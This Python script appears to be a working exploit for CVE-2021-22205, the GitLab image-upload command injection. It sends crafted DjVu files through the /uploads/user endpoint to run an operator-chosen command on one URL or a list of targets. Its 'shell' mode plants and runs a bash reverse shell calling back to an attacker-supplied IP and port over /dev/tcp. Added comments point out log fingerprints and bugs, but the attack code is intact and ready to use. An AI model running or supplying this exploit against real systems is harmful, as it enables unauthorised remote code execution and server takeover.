# -*- coding: utf-8 -*-
'''
@Time : 2021/10/30 22:11
@Author : Seals6
@File : CVE-2021-22205.py
@contact: [email protected]
@blog: blog.seals6.top
'''
import argparse
import requests
import re
from bs4 import BeautifulSoup
# Silences urllib3's InsecureRequestWarning: every request in this file passes
# verify=False, so TLS certificates are never checked.
requests.packages.urllib3.disable_warnings()
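def loadFile(file):
    """Read one URL per line from *file*, prefixing ``http://`` where no scheme is given.

    Args:
        file: path of a text file holding one URL per line.

    Returns:
        list[str]: the stripped lines, in file order; any line whose first four
        characters are not ``http`` (including an empty line) gets ``http://``
        prepended, exactly as the original loop did.

    Raises:
        OSError: if *file* cannot be opened.
    """
    # The context manager closes the handle (the original left it open), and the
    # result is no longer bound to a local named ``list``, which shadowed the builtin.
    with open(file, 'r') as fh:
        lines = [line.strip() for line in fh]
    return [line if line[:4] == 'http' else 'http://' + line for line in lines]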
def unPoc1(url,command):
    """Send one crafted image upload to ``url`` and print whether the server accepted it.

    Args:
        url: base URL of the target; trailing "/" characters are stripped.
        command: string concatenated verbatim into the upload body.

    Returns:
        None. The outcome is printed; any exception is caught and printed.
    """
    session = requests.Session()
    # Proxy pool configuration (disabled)
    # proxies = {
    # 'http': '127.0.0.1:8080',
    # 'https': '127.0.0.1:8080'
    # }
    try:
        # Fetch the sign-in page to read a CSRF token; verify=False disables TLS verification.
        r = session.get(url.strip("/") + "/users/sign_in", verify=False)
        soup = BeautifulSoup(r.text, features="lxml")
        # Token is taken by position (the 17th <meta> tag, index 16); any change in the
        # page's head layout makes this raise IndexError or read the wrong tag.
        token = soup.findAll('meta')[16].get("content")
        # Multipart body with a hard-coded boundary, filename "test.jpg", a jpeg
        # Content-Type, and a body that begins with DjVu magic bytes; ``command`` is
        # spliced in by plain string concatenation.
        data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{"+ command +"} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n"
        # Static User-Agent, boundary string and header set: fixed fingerprints of this
        # script that a request log or WAF rule can match on.
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
            "Connection": "close",
            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
            "X-CSRF-Token": f"{token}",
            "Accept-Encoding": "gzip, deflate"
        }
        # The server's image-processing error text is treated as the success indicator.
        Checkflag = 'Failed to process image'
        # POST to /uploads/user: the request path to look for in access logs.
        req = session.post(url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False)
        # Burp proxy
        # req = session.post(url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False, proxies=proxies)
        res = req.text
        if Checkflag in res:
            # Chinese messages: upload endpoint reachable, request sent, check manually.
            print("[+]%s gitlab存在未授权上传" %req.url)
            print("[+]发送成功,请手动检查!")
        else:
            # Chinese message: the marker text was not returned for this URL.
            print("[-]faild!")
            print("[-]%s 不存在未授权端口,请尝试注册新用户!" %req.url)
    except Exception as e:
        # Every failure (network error, parse error, IndexError from the token lookup)
        # is reduced to a printed message; nothing is re-raised.
        print(e)
def shell(url,rurl,rport):
    """Send three crafted uploads to ``url`` in sequence and print the result of each.

    Args:
        url: base URL of the target; trailing "/" characters are stripped.
        rurl: host string interpolated into the first command of ``payload``.
        rport: port string interpolated into the first command of ``payload``.

    Returns:
        None. Outcomes are printed; any exception is caught and printed.
    """
    session = requests.Session()
    # Proxy pool configuration (disabled)
    # proxies = {
    # 'http': '127.0.0.1:8080',
    # 'https': '127.0.0.1:8080'
    # }
    try:
        # Fetch the sign-in page to read a CSRF token; verify=False disables TLS verification.
        r = session.get(url.strip("/") + "/users/sign_in", verify=False)
        soup = BeautifulSoup(r.text, features="lxml")
        # Token is taken by position (the 17th <meta> tag, index 16); any change in the
        # page's head layout makes this raise IndexError or read the wrong tag.
        token = soup.findAll('meta')[16].get("content")
        # Three commands, sent one per upload in this order; rurl/rport are interpolated
        # into the first. The script-fixed path /tmp/1.sh is a host-side artifact.
        payload=["echo 'bash -i >& /dev/tcp/%s/%s 0>&1' > /tmp/1.sh" % (rurl, rport),
                 "chmod +x /tmp/1.sh",
                 "/bin/bash /tmp/1.sh",]
        data_list= []
        # Build one multipart body per command: hard-coded boundary, filename "test.jpg",
        # a body starting with DjVu magic bytes, and the command spliced in by concatenation.
        for i in range(0,len(payload)):
            command = payload[i]
            data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{"+ command +"} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n"
            data_list.append(data)
        # Static User-Agent, boundary string and header set: fixed fingerprints of this
        # script that a request log or WAF rule can match on.
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
            "Connection": "close",
            "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5",
            "X-CSRF-Token": f"{token}",
            "Accept-Encoding": "gzip, deflate"
        }
        # The server's image-processing error text is treated as the success indicator.
        Checkflag = 'Failed to process image'
        # Three POSTs to /uploads/user in quick succession from one session: the
        # pattern to look for in access logs.
        for i in range(0,len(data_list)):
            req = session.post(url.strip("/") + "/uploads/user", data=data_list[i], headers=headers, verify=False)
            # Burp proxy
            # req = session.post(url.strip("/") + "/uploads/user", data=data_list[i], headers=headers, verify=False, proxies=proxies)
            res = req.text
            if Checkflag not in res:
                # Chinese message: the marker text was not returned for this URL.
                print("[-]faild!")
                print("[-]%s 不存在未授权端口,请尝试注册新用户!" % req.url)
            else:
                # Chinese message: request sent, check the result. The loop does not stop
                # on failure; all three uploads are attempted regardless.
                print("[+]反弹shell发送成功,请检查")
    except Exception as e:
        # Every failure (network error, parse error, IndexError from the token lookup)
        # is reduced to a printed message; nothing is re-raised.
        print(e)
if __name__ == '__main__':
    # Command-line entry point. ``-w un`` reads one string from stdin and passes it to
    # unPoc1() for a single URL (-u) or for every URL in a file (-f); ``-w shell``
    # calls shell() with -u, -ri and -rp. Any other -w value is silently ignored.
    parser = argparse.ArgumentParser(description="CVE-2021-22205")
    parser.add_argument('-w', '--way', type=str, help="Exploit way unauthorized or reverse shell")
    parser.add_argument('-u', '--url', type=str, help="url like http://127.0.0.1:8080")
    parser.add_argument('-f', '--file', type=str, help="url file path")
    parser.add_argument('-ri', '--reip', type=str, help="reverse ip")
    # NOTE: the long option is spelled --report although it carries the port value.
    parser.add_argument('-rp', '--report', type=str, help="reverse port")
    args = parser.parse_args()
    if args.way == 'un':
        # Chinese prompt asking for the command string; the trailing ';' is a no-op.
        command = input("[+]请输入命令,默认不回显,请用dnslog进行测试:\n");
        if args.url and args.file:
            # Chinese message: -u and -f are mutually exclusive.
            print("[-]wrong!url和file只能存在一个!")
        elif args.url:
            unPoc1(args.url,command)
        else:
            # NOTE(review): also reached when neither -u nor -f was given, in which case
            # loadFile(None) raises TypeError. The local name ``list`` shadows the builtin.
            list = loadFile(args.file)
            for i in list:
                unPoc1(i,command)
    elif args.way == 'shell':
        # No check that -u, -ri or -rp were supplied; None values are passed through.
        shell(args.url,args.reip,args.report)